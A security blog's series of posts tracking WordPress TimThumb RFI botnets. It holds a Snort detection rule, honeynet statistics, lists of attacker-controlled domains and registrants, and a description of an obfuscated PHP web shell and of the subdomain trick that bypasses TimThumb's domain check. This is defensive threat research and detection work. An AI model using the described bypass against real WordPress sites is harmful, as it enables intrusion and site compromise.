aka wow on ZATAZ.com
Posts tagged WordPress
SUC029 : WordPress TimThumb RFI Web Scanner/Robot
03 months ago
- Use Case Reference : SUC029
- Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
- Use Case Detection : IDS / HTTP logs
- Attacker Class : Opportunists
- Attack Sophistication : Unsophisticated
- Identified tool(s) : ByroeNet scanners variant
- Source IP(s) : Random
- Source Countries : Random
- Source Port(s) : Random
- Destination Port(s) : 80/TCP, 443/TCP
Possible(s) correlation(s) :
- Related blog posts “WordPress TimThumb Botnets Spreads Status“, “WordPress TimThumb Botnet Visualization and Status” and “WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector“.
Source(s) :
- Related blog posts “WordPress TimThumb Botnets Spreads Status“, “WordPress TimThumb Botnet Visualization and Status” and “WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector“.
ZATAZ SIG 1010050 triggers are :
- URI should contain “wp-content” and “php?src=http“
- The source port could be any FROM EXTERNAL_NET in destination of an HTTP_SERVERS HTTP_PORTS.
- Threshold is configured to count 1 occurrence in 30 seconds for the same IP source.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - posssible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
SIG 1010050 1 Week events activity
SIG 1010050 1 month events activity
SIG 1010050 1 year events activity
1 Month TOP 10 source IPs for SIG 1010050
WordPress TimThumb Botnets Spreads Status
04 months ago
Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as botnet recruitment vector, and has now spread in multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs visitors, diffusion of spam and phishing campaign, DDoS, hack of other web sites (such as About.us domain name registrar), etc, etc. Some of these infected WordPress were controlled by well known C&C servers used and shared by black hats from around the world.
We are soon six month after the discovery of the vulnerability and a status on the WordPress TimThumb botnets could be done. Are the botnets still active, are less WordPress blogs vulnerable, is the pick of spread over ? We will try, through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our Honey Net, to answer these questions. The datas collected through our Honey Net are representing only a small part of the real activity of the WordPress TimThumb botnets, but these datas could also represent an extrapolation of the real activities.
List of all detected infected domains
You can find in the following table the complete list of all detected infected domains how were called during the WordPress TimThumb RFI attack, with the domain associated IP address, the country where the blog were hosted, the number of distinct source IPs how have call the related domain during the RFI attack and the live time of the domain name.
We have a total of 202 affected domains. “blogger.com.dollhousedelights.com“, hosted in Vietnam, was the affected domain how was called by the much more distinct source IPs (258), followed by “picasa.com.xpl.be” with 152 distinct source IPs, and at the third place “blogger.com.midislandrental.com” with 110 distinct source IPs.
“picasa.com.xpl.be” and “picasa.computergoogle.co.cc” have the longer live time with 105 days, followed by “wordpress.com.hostdail.com” and “blogger.com.pasbar.com” with 72 days.
Infected blogs countries repartition
You can find in the following graphs (Chart1 – Chart2) the geographically repartition of the infected blogs.
We have a total of 31 different countries for 202 affected domains. United States is in first position with 58.9% (129) of all infected blogs, followed by Australia, Canada and United Kingdom with each 3.7% (8) of all infected blogs.
Infected blogs countries repartition by number of source IPs
You can find in the following graphs (Chart3 – Chart4) the geographically repartition of the infected blogs by number of distinct source IPs how have call the infected blogs.
We have a total of 1734 distinct source IPs for 202 affected domains and 31 different hosting countries. United States is in first position with 48.5% (841), followed by Vietnam with 14% (243), Indonesia with 4.7% (82) and Taiwan with 4.1% (71).
Timeline by day of infected blogs calls and source IPs
You can find in the following timeline (Chart5) a representation by day of the infected blogs number calls and source IPs.
November 2011 was the most active month for the number of source IPs and that in December the number of source IPs has drastically decrease. You can see that during the first half of November the number of infected blogs calls have increase days after days, and since the 22 November the number of infected blogs is stabilized but is not decreasing.
Geographic timeline by day of all source IPs
In this geographic time map we’re loading datas from a Google Spreadsheet (published here). These datas are coming from our HoneyNet and are representing the geographic Wordpress TimThumb Botnet activities from 15-09-2011 to 03-12-2011.
AfterGlow representation of the WordPress TimThumb
By clicking on the following link, you can download an AfterGlow representation of the WordPress TimThumb botnets with links between each nodes.
Conclusion
WordPress TimThumb botnets are still continuing to infect new blogs, but the associated activities are decreasing since second half December. Maybe black hats are still in holidays :) My personal opinion is that we will steal continu to hear about these botnets during complete 2012.
About.US Domain Names Registrar Owned
05 months ago
in Various
During some analysis on the WordPress TimThumb Botnet, I have discover that an .US domain registrar know as “About.US” is completely compromised… and this since minimum the 15 September. Some RFI (Remote File Inclusion) scripts, how are exploiting the WordPress TimThumb vulnerability, are calling, in a obfuscate mode, a hidden file “stun.jpg” on “About.US” Web site.
This file “stun.jpg” file is also obfuscated and identified as a PHP Shell Malware by 3/20 anti viruses on Jotti, 3/36 anti viruses on VirusScan and 3/43 anti viruses on VirusTotal. The obfuscation is done 10 times with gzinflate(str_rot13(base64_decode())) functions. After deobfuscating the revealed code is a Web PHP Shell named “[ STUNSHELL #unknown @ ByroeNet ]“. You can find this Web PHP Shell with a simple Google dork.
As you know, to exploit WordPress TimThumb vulnerability some extra technical infrastructure is required, such as to be able to create domain names or subdomains containing :
- flickr.com
- picasa.com
- blogger.com
- wordpress.com
- img.youtube.com
- upload.wikimedia.org
- photobucket.com
Isn’t it easy to create such domains or subdomains if you have own a Domain Name registrar !
WordPress TimThumb Botnet Visualization and Status
06 months ago
In a previous blogpost I have demonstrate that the WordPress TimThumb RFI vulnerability is used as a botnet recruitment vector. Since this blogpost 1 month has occur, and two and half months since our HoneyNet is gathering events about this botnet.
Actually we have see 30 different domains, related to 37 different IP addresses used to infect vulnerable WordPress (see table bellow).
These 30 different domains are for now related to 370 IP addresses how are surely infected WordPress. Here a representation on how is linked to how.
Also you can find by clicking on the following link a geo localization time map of all the related IP addresses.
WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector
07 months ago
in Various
On thirst August 2011, Mark Maunder had reveal, through a defacement experience, that “timthumb.php” script, included in hundreds of WordPress themes, was vulnerable to remote file inclusion (RFI) attack. TimThumb is small php script for cropping, zooming and resizing web images (jpg, png, gif).
The default configuration of “timthumb.php” script, in many WordPress themes, allow remote file inclusion from the following domains:
- flickr.com
- picasa.com
- blogger.com
- wordpress.com
- img.youtube.com
- upload.wikimedia.org
- photobucket.com
Unfortunately the domain code verification was buggy, allowing remote file inclusion if the above domain strings appears anywhere in the hostname, for example : picasa.com.zataz.com.
To create such DNS entries you need to have control on a zone hosted by a DNS server, the attack vector is more complex than a simple RFI attack how don’t need this kind of resource.
Since few weeks, I observe through my Honeynet that attempts to exploit this vulnerability are increasing and that it is now fully integrated as dork into the ByroeNet like tools. The fact is that more and more exploitable DNS entries are created how allow the TimThumb vulnerability exploitation.
For example, one of the most active TimThumb vulnerability domain is actually “picasa.com.xpl.be“, how has the following details :
- RFI IP : 98.158.186.250
- RFI FQDN : 90.158.186.250.static.midphase.com
- RFI Country : United States
Domain name servers authority for “picasa.com.xpl.be” and “xpl.be“ domain names are :
; AUTHORITY SECTION: xpl.be. 81644 IN NS ns2.afraid.org. xpl.be. 81644 IN NS ns3.afraid.org. xpl.be. 81644 IN NS ns1.afraid.org. xpl.be. 81644 IN NS ns4.afraid.org. ;; ADDITIONAL SECTION: ns1.afraid.org. 508 IN A 67.19.72.206 ns2.afraid.org. 206 IN A 174.37.196.55 ns3.afraid.org. 26 IN A 72.20.15.61 ns4.afraid.org. 26 IN A 174.128.246.102
afraid.org is a free DNS hosting, dynamic DNS hosting, static DNS hosting, subdomain and domain hosting services provider.
xpl.be domain name has been registered, the 5 April 2010, through Key-Systems GmbH a german domain name registrar and the registration informations are :
Registrant Name : Dolores Aleman Organisation : Dolores Aleman Address : 1014 south 2nd st - 78550 Harlingen AL US Email : [email protected] Registrant technical contacts Name : Mr XpL Organisation : XpL inc Address : 1014 south 2nd st - 78550 Harlingen AL US Email : [email protected]
Both “picasa.com.xpl.be” and “xpl.be” are hosted on IP 98.158.186.250 from midPhase.com a hosting service provider, but this hosting service provider doesn’t provide any free hosting services. Also as you can see below the xpl.be web site designer know ASCII art.
Other example is ”picasa.compress.cu.cc“, registered on “cu.cc” the 13 September 2011 by “[email protected]“. the domain name and website are hosted on 50Webs.com a free DNS and hosting provider.
“picasa.computergoogle.co.cc“, registered on “co.cc” registrar the 22 September 2011 by “[email protected]“. The domain name and website are hosted on 50Webs.com a free DNS and hosting provider.
“wordpress.com.daliacarella.com“, registered on “www.000domains.com” the 17 July 2011 by “[email protected]”. The domain name and the website are hosted on HostDime.com.
“blogger.com.donshieldphotography.com“, registered on Visual Solutions Group Inc the 19 January 2011 by “Don Shield Photography“. The domain name and the website are hosted on Visual Solutions Group Inc. “www.donshieldphotography.com” seem to be a legitimate Web site, but Visual Solutions Group Inc infrastructure seem also compromised.
“blogger.com.aptum.nu“, registered on nunames.nu the 24 October 2006 by “[email protected]”. The domain name and the website are hosted on ODERLAND. “aptum.nu” seem to be a legitimate Web site.
“blogger.com.jewelhost.co.uk” registered on 123-reg.co.uk the 04 May 2010 by “Callum Baillie”. The domain name and the website are hosted on JewelHost.co.uk a hosting provider how seem to be compromised.
“blogger.com.tara-baker.com” registered on Tucows Domains the 07 January 2010 by “UK2.net”. The domain name and the website are hosted on VC-Hosting.com a hosting provider how seem to be compromised.
“picasa.com.marcialia.com.br” has his domain name and website hosted on SERVER4YOU a hosting provider how propose free hosting trial during 6 months.marcialia.com.br seem to be a legitimate web site, the account seem to be compromised.
Other domains how are also participating to the TimThumb Botnet : “picasa.com.crimecyber.tk“, “blogger.com.1h.hu“, “picasa.com.nixonmu.com“, “blogger.com.lionsurveys.com“, “blogger.com.autoelectricahernandez.com“.
You have also ”picasa.com.throngbook.com“, “blogger.com.cursos.secundariatecnica33.org“ how are actually down.
All these compromised sites seem to be related to the Indonesian Byroe.net network.
Here under you can find some live stats on the TimThumb vulnerability exploitation attempts detected by our Honeynet.
Recent Comments